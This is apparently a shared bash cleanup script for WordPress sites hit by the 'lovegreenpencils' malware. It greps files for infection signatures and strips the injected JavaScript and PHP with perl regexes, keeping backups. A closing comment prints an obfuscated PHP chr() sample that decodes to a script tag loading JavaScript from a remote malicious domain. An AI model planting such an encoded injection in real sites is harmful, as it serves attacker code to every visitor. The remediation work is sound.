Fixes love green pencils wordpress malware

FixLoveGreenPencilsMalware.sh

#!/bin/bash

# Regex to fix DB is: "s/<script[\s\S]*?>[\s\S]*?<\/script>//g"

totalInfections=0
filesProcessed=0

echo "Welcome to lovegreenpencils malware fixer by black-dragon74"
echo "This fix is divided into 3 phases."
echo "Phase 1 fixes the \`beckup\` files."
echo "Phase 2 fixes the header injections."
echo "Phase 3 fixes the deep rooted JS PHP and JSON injections"
echo

# Begin phase 1
read -p "Press any key to begin the phase 1: " yay
clear
echo "Scanning....."
for f in $(grep -ril "Element.prototype.appendAfter" ./*); do
	
	# Don't fix the fixer itslef :D
	if [[ $f == "./fix.sh" ]]; then
		continue;
	fi

	# If a backup exists, we created it, don't process it again
	if [[ $(echo $f | grep ".perlbak") ]]; then
		continue;
	fi

	# Otherwise fix all files recursively
	echo "Found file $f"
	echo "Backing up and fixing the infection"
	echo
	perl -pi.perlbak -e 's/Element\.prototype\.appendAfter[\s\S]*?\}\)\(\);//gi' "${f}"

	((filesProcessed ++))
done

echo "Phase 1 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))
filesProcessed=0

# Begin phase 2
read -p "Press any key to begin the phase 2: " yay
clear
echo "Scanning....."
for f in $(grep -ril "REQUEST\['lt'\]" ./*); do
	
	# Don't fix the fixer itslef :D
	if [[ $f == "./fix.sh" ]]; then
		continue;
	fi

	# If a backup exists, we created it, don't process it again
	if [[ $(echo $f | grep ".perlbak") ]]; then
		continue;
	fi

	# Otherwise fix all files recursively
	echo "Found file $f"
	echo "Backing up and fixing the infection"
	echo
	perl -pi.perlbak -e 's/<\?php\ \$v[\s\S]*?\?>//gi' "${f}"

	((filesProcessed ++))
done

echo "Phase 2 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))
filesProcessed=0

# Begin phase 3
read -p "Press any key to begin the phase 3: " yay
clear
echo "Scanning....."
for f in $(grep -ril "lovegreenpencils" ./*); do
	
	# Don't fix the fixer itslef :D
	if [[ $f == "./fix.sh" ]]; then
		continue;
	fi

	# If a backup exists, we created it, don't process it again
	if [[ $(echo $f | grep ".perlbak") ]]; then
		continue;
	fi

	# Otherwise fix all files recursively
	echo "Found file $f"
	echo "Backing up and fixing the infection"
	echo
	perl -pi.perlbak -e "s/<script\ type=\'text\/javascript\'\ src=\'https:\/\/dock\.lovegreenpencils[\s\S]*?<\/script>//gi" "${f}"

	((filesProcessed ++))
done

echo "Phase 3 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))
filesProcessed=0


# Processing complete.
echo
echo "Found, backed up and fixed $totalInfections infected files."
read -p "Processing complete. Press any key to exit. " yay
exit 0

I am seeing a trend of a new variation of char code being used.
<?php echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(46).chr(100).chr(111).chr(110).chr(116).chr(107).chr(105).chr(110).chr(104).chr(111).chr(111).chr(111).chr(116).chr(46).chr(116).chr(119).chr(47).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(106).chr(115).chr(63).chr(122).chr(61).chr(105).chr(38).chr(105).chr(100).chr(61).chr(49).chr(49).chr(50).chr(38).chr(99).chr(108).chr(105).chr(100).chr(61).chr(53).chr(49).chr(50).chr(38).chr(115).chr(105).chr(100).chr(61).chr(55).chr(56).chr(57).chr(54).chr(51).chr(52).chr(53).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62); ?>